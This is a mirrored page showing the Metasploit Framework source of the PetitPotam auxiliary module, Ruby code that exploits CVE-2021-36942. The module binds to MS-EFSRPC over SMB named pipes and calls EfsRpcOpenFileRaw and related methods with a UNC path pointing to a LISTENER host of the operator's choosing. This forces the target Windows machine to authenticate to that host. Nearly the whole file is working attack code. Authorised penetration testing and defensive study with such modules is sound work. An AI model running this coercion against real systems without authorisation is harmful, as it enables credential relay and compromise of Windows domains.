Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/scanner/dcerpc/petitpotam.rb
19535 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
require 'windows_error'

7
require 'ruby_smb'

8
require 'ruby_smb/error'

9
require 'ruby_smb/dcerpc/lsarpc'

10
require 'ruby_smb/dcerpc/efsrpc'

11


12
class MetasploitModule < Msf::Auxiliary

13


14
  module EfsrpcOverLsarpc

15
    include RubySMB::Dcerpc::Efsrpc

16


17
    UUID = RubySMB::Dcerpc::Efsrpc::LSARPC_UUID

18
  end

19


20
  include Msf::Exploit::Remote::DCERPC

21
  include Msf::Exploit::Remote::SMB::Client::Authenticated

22
  include Msf::Auxiliary::Scanner

23
  include Msf::Auxiliary::Report

24


25
  METHODS = %w[EfsRpcOpenFileRaw EfsRpcEncryptFileSrv EfsRpcDecryptFileSrv EfsRpcQueryUsersOnFile EfsRpcQueryRecoveryAgents].freeze

26
  # The LSARPC UUID should be used for all pipe handles, except for the efsrpc one. For that one use

27
  # Efsrpc and it's normal UUID

28
  PIPE_HANDLES = {

29
    lsarpc: {

30
      endpoint: EfsrpcOverLsarpc,

31
      filename: 'lsarpc'.freeze

32
    },

33
    efsrpc: {

34
      endpoint: RubySMB::Dcerpc::Efsrpc,

35
      filename: 'efsrpc'.freeze

36
    },

37
    samr: {

38
      endpoint: RubySMB::Dcerpc::Lsarpc,

39
      filename: 'samr'.freeze

40
    },

41
    lsass: {

42
      endpoint: RubySMB::Dcerpc::Lsarpc,

43
      filename: 'lsass'.freeze

44
    },

45
    netlogon: {

46
      endpoint: RubySMB::Dcerpc::Lsarpc,

47
      filename: 'netlogon'.freeze

48
    }

49
  }.freeze

50


51
  def initialize

52
    super(

53
      'Name' => 'PetitPotam',

54
      'Description' => %q{

55
        Coerce an authentication attempt over SMB to other machines via MS-EFSRPC methods.

56
      },

57
      'Author' => [

58
        'GILLES Lionel',

59
        'Spencer McIntyre'

60
      ],

61
      'References' => [

62
        [ 'CVE', '2021-36942' ],

63
        [ 'URL', 'https://github.com/topotam/PetitPotam' ],

64
        [ 'URL', 'https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/403c7ae0-1a3a-4e96-8efc-54e79a2cc451' ]

65
      ],

66
      'License' => MSF_LICENSE

67
    )

68


69
    register_options(

70
      [

71
        OptString.new('LISTENER', [ true, 'The host listening for the incoming connection', Rex::Socket.source_address ]),

72
        OptEnum.new('PIPE', [ true, 'The named pipe to use for triggering', 'lsarpc', PIPE_HANDLES.keys.map(&:to_s) ]),

73
        OptEnum.new('METHOD', [ true, 'The RPC method to use for triggering', 'Automatic', ['Automatic'] + METHODS ])

74
      ]

75
    )

76
  end

77


78
  def run_host(_ip)

79
    begin

80
      connect

81
    rescue Rex::ConnectionError => e

82
      fail_with(Failure::Unreachable, e.message)

83
    end

84


85
    begin

86
      smb_login

87
    rescue Rex::Proto::SMB::Exceptions::Error, RubySMB::Error::RubySMBError => e

88
      fail_with(Failure::NoAccess, "Unable to authenticate ([#{e.class}] #{e}).")

89
    end

90
    report_service(service_data)

91


92
    begin

93
      @tree = simple.client.tree_connect("\\\\#{sock.peerhost}\\IPC$")

94
    rescue RubySMB::Error::RubySMBError => e

95
      raise StandardError, "Unable to connect to the remote IPC$ share ([#{e.class}] #{e})."

96
    end

97


98
    handle_args = PIPE_HANDLES[datastore['PIPE'].to_sym]

99
    fail_with(Failure::BadConfig, "Invalid pipe: #{datastore['PIPE']}") unless handle_args

100


101
    # rename tree_file

102
    @pipe = @tree.open_file(filename: handle_args[:filename], write: true, read: true)

103
    handle = dcerpc_handle(

104
      handle_args[:endpoint]::UUID,

105
      handle_args.fetch(:version, '1.0'),

106
      handle_args.fetch(:protocol, 'ncacn_np'),

107
      ["\\#{handle_args[:filename]}"]

108
    )

109
    vprint_status("Binding to #{handle} ...")

110
    @pipe.bind(

111
      endpoint: handle_args[:endpoint],

112
      auth_level: RubySMB::Dcerpc::RPC_C_AUTHN_LEVEL_PKT_PRIVACY,

113
      auth_type: RubySMB::Dcerpc::RPC_C_AUTHN_WINNT

114
    )

115
    vprint_status("Bound to #{handle} ...")

116


117
    if datastore['METHOD'] == 'Automatic'

118
      methods = METHODS

119
    else

120
      methods = [datastore['METHOD']]

121
    end

122


123
    methods.each do |method|

124
      vprint_status("Attempting to coerce authentication via #{method}")

125
      response = efs_call(

126
        method,

127
        file_name: "\\\\#{datastore['LISTENER']}\\#{Rex::Text.rand_text_alphanumeric(4..8)}\\#{Rex::Text.rand_text_alphanumeric(4..8)}.#{Rex::Text.rand_text_alphanumeric(3)}"

128
      )

129
      if response.nil?

130
        unless method == methods.last

131
          # rebind if we got a DCERPC error (as indicated by no response) and there are more methods to try

132
          vprint_status("Rebinding to #{handle} ...")

133
          @pipe.close

134
          @pipe = @tree.open_file(filename: handle_args[:filename], write: true, read: true)

135
          @pipe.bind(

136
            endpoint: handle_args[:endpoint],

137
            auth_level: RubySMB::Dcerpc::RPC_C_AUTHN_LEVEL_PKT_PRIVACY,

138
            auth_type: RubySMB::Dcerpc::RPC_C_AUTHN_WINNT

139
          )

140
        end

141


142
        next

143
      end

144


145
      error_status = response.error_status.to_i

146
      win32_error = ::WindowsError::Win32.find_by_retval(error_status).first

147
      case win32_error

148
      when ::WindowsError::Win32::ERROR_BAD_NETPATH

149
        # this should be the response even if LISTENER was inaccessible

150
        print_good('Server responded with ERROR_BAD_NETPATH which indicates that the attack was successful')

151
        break

152
      when nil

153
        print_status("Server responded with unknown error: 0x#{error_status.to_s(16).rjust(8, '0')}")

154
      else

155
        print_status("Server responded with #{win32_error.name} (#{win32_error.description})")

156
      end

157
    end

158
  end

159


160
  def cleanup

161
    if @pipe

162
      @pipe.close

163
      @pipe = nil

164
    end

165


166
    if @tree

167
      @tree.disconnect!

168
      @tree = nil

169
    end

170


171
    super

172
  end

173


174
  def efs_call(name, **kwargs)

175
    request = RubySMB::Dcerpc::Efsrpc.const_get("#{name}Request").new(**kwargs)

176


177
    begin

178
      raw_response = @pipe.dcerpc_request(

179
        request,

180
        auth_level: RubySMB::Dcerpc::RPC_C_AUTHN_LEVEL_PKT_PRIVACY,

181
        auth_type: RubySMB::Dcerpc::RPC_C_AUTHN_WINNT

182
      )

183
    rescue Rex::Proto::DCERPC::Exceptions::Fault => e

184
      print_error "The #{name} Encrypting File System RPC request failed (#{e.message})."

185
      return nil

186
    end

187


188
    RubySMB::Dcerpc::Efsrpc.const_get("#{name}Response").read(raw_response)

189
  end

190


191
  def service_data

192
    {

193
      host: rhost,

194
      port: rport,

195
      host_name: simple.client.default_name,

196
      proto: 'tcp',

197
      name: 'smb',

198
      info: "Module: #{fullname}, last negotiated version: SMBv#{simple.client.negotiated_smb_version} (dialect = #{simple.client.dialect})"

199
    }

200
  end

201
end

202


203